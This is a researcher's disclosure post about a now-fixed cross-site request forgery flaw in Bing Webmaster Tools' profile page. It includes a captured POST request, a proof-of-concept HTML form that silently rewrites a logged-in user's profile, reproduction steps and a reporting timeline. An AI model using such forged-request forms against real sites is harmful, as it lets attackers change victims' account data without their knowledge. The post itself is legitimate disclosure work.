Microsoft Bing webmaster tools CSRF Vulnerability

I have noticed a CSRF vulnerability in the Bing webmaster tools website when I was working on SEO stuff for my site. I have reported the vulnerability to Microsoft and they fixed it now. CSRF attack on the webmaster tools website allows an attacker to change the logged in user’s profile without his knowledge. Complete details about the vulnerability are provided below.

Bing webmaster tools are used by website administrators to improve the site performance (SEO) in the Bing search engine. User profile page in the webmaster tools website is vulnerable to Cross site request forgery attack. Editing and saving the user’s profile in the webmaster tools website sends the below POST request to the server. You can notice that the POST request does not contain any CSRF tokens in the body.

POST /webmaster/Home/AddSiteAndSaveProfile HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-IN User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: ssl.bing.com Content-Length: 298 Connection: Keep-Alive Cache-Control: no-cache Cookie: SRCHUID=V=2&GUID=2462AEB887D84132AB0618A62918004E; SRCHD=SM=1&MS=2412868&D=2412867&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20120802; MUID=304F0F31C56C634E0FF80C81C4626317; sample=75; ANON=A=31F3C21150BD85D5D0D7A653FFFFFFFF&E=cf4&W=1; NAP=V=1.9&E=c9a&C=cXG_15GH6sC_sMrxIO7LQdDowldUlTqmQaeoYvbJnsysU1edgzUh7w&W=1; _HOP=I=1&TS=1346886727; _SS=SID=D678E4708A614DF29AE30B8C415F32BA firstName=satish&lastName=bs&email=satishb3@hotmail.com&jobrole=&company=securitylearn.net&companysize=&industry=17&contactphone=&city=&state=&zip=&country=in&isAgency=false&communicationsOptIn=true&communicationsOptIn=false&emailFrequency=7&alert=2&alert=4&alert=3&alert=5&alerts=

This would allow an attacker to change the logged in user’s profile without his knowledge by tricking him to visit a URL which loads the below html file.

<form id=f1 action="https://ssl.bing.com/webmaster/Home/AddSiteAndSaveProfile" method="POST"/> <input type="hidden" name="firstName" value="satish" /> <input type="hidden" name="lastName" value="bs" /> <input type="hidden" name="email" value="satishb3@hotmail.com" /> <input type="hidden" name="jobrole" value="" /> <input type="hidden" name="company" value="securitylearn.net" /> <input type="hidden" name="companysize" value="" /> <input type="hidden" name="industry" value="17" /> <input type="hidden" name="contactphone" value="" /> <input type="hidden" name="city" value="" /> <input type="hidden" name="state" value="" /> <input type="hidden" name="zip" value="" /> <input type="hidden" name="country" value="in" /> <input type="hidden" name="isAgency" value="false" /> <input type="hidden" name="communicationsOptIn" value="true" /> <input type="hidden" name="communicationsOptIn" value="false" /> <input type="hidden" name="emailFrequency" value="7" /> <input type="hidden" name="alert" value="2" /> <input type="hidden" name="alert" value="4" /> <input type="hidden" name="alert" value="3" /> <input type="hidden" name="alert" value="5" /> <input type="hidden" name="alerts" value="" />

Steps to verify:



Open IE and log into Bing webmaster tools – http://www.bing.com/toolbox/ webmaster Click on profile link (top right side) and look at the existing data. Create an html file with the above content & open it with IE. Later the html file prompts to open or save an attachment, click on cancel button. Now in the webmaster tools site, click on profile link and notice that the user data is replaced with the content in the html file.

CSRF tokens are not implemented across the whole website and making it to vulnerable for CSRF attacks.

[TimeLine]

August 02, 2012, I have reported the vulnerability to Microsoft.

August 03, 2012 they have opened MSRC (Microsoft Security Response Center) case.

August 12, 2012, I have noticed that the vulnerability is being fixed and emailed them for the update.

August 14, 2012 they replied back with this message- “The product team is still actively investigating the issue to ensure a full understanding and comprehensive remediation.”

September 16, 2012, they fixed the vulnerability.

Microsoft adding my name in their September 2012 security researchers list.

[Updated on – October 02, 2012]

Microsoft added my name to September 2012 security researcher acknowledgements list-

http://technet.microsoft.com/en-us/security/cc308589